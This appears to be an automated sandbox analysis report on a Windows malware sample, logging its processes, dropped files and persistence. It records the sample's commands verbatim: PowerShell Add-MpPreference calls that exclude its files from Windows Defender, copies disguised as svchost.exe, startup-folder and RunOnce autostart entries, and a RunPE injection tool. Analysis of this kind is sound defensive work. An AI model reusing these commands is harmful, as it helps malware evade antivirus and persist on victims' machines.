                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force (4 identical entries)
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force (2 identical entries)
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force (2 identical entries)
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force (6 identical entries)
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force (4 identical entries)
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force (6 identical entries)
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Process created: unknown unknown
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004
                Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (10 identical entries)
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
                Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4328
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_01
                Source: RYhdmjjr94.exe, CBBBDD7A/u0038CE91158.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u0038CE91158.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: svchost.exe.0.dr, CBBBDD7A/u0038CE91158.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u0038CE91158.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u0038CE91158.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u0038CE91158.cs | Cryptographic APIs: 'CreateDecryptor'
                Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
                Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: RYhdmjjr94.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RYhdmjjr94.exe | Static file information: File size 1053624 > 1048576
                Source: RYhdmjjr94.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                Source: RYhdmjjr94.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.265038309.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.580652189.00000000064DD000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp
                Source: Binary string: RYhdmjjr94.PDBnn source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: = a.pdb= source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: osymbols\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb* source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbote source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbtl@ source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbop\RYhd( source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: QC:\Users\user\Desktop\RYhdmjjr94.PDB source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbnt source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbM source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdbp source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb" source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: *lC:\Users\user\Desktop\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdb8 source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\Microsoft.PythonTools.IronPython.pdbpdbhon.pdb source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbAJ!B source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.PythonTools.IronPython.pdb| source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32`Q source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: l`C:\Windows\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: aspnet_compiler.pdb source: RYhdmjjr94.exe, 00000000.00000000.431822096.00000000029FC000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.415482365.0000000000287000.00000002.00020000.sdmp, 36C95A71.exe, 00000018.00000000.310088788.0000000000BD7000.00000002.00020000.sdmp, 36C95A71.exe, 00000020.00000000.332330313.0000000000297000.00000002.00020000.sdmp, svchost.exe, 00000024.00000000.359855846.00000000003D7000.00000002.00020000.sdmp, svchost.exe, 00000028.00000000.381985569.0000000000717000.00000002.00020000.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbo source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_0040B550 push eax; ret (2 identical entries)
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_0040B50D push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 6_2_0040B550 push eax; ret (2 identical entries)
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 6_2_0040B50D push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

                Persistence and Installation Behavior:

                Drops PE files with benign system names
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File created: C:\Users\Public\Documents\2FDD6624\svchost.exe (2 identical entries)
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | File created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | File created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe

                Boot Survival:

                barindex
                Drops PE files to the startup folderShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to dropped file
                Creates autostart registry keys with suspicious namesShow sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe\:Zone.Identifier:$DATAJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeJump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
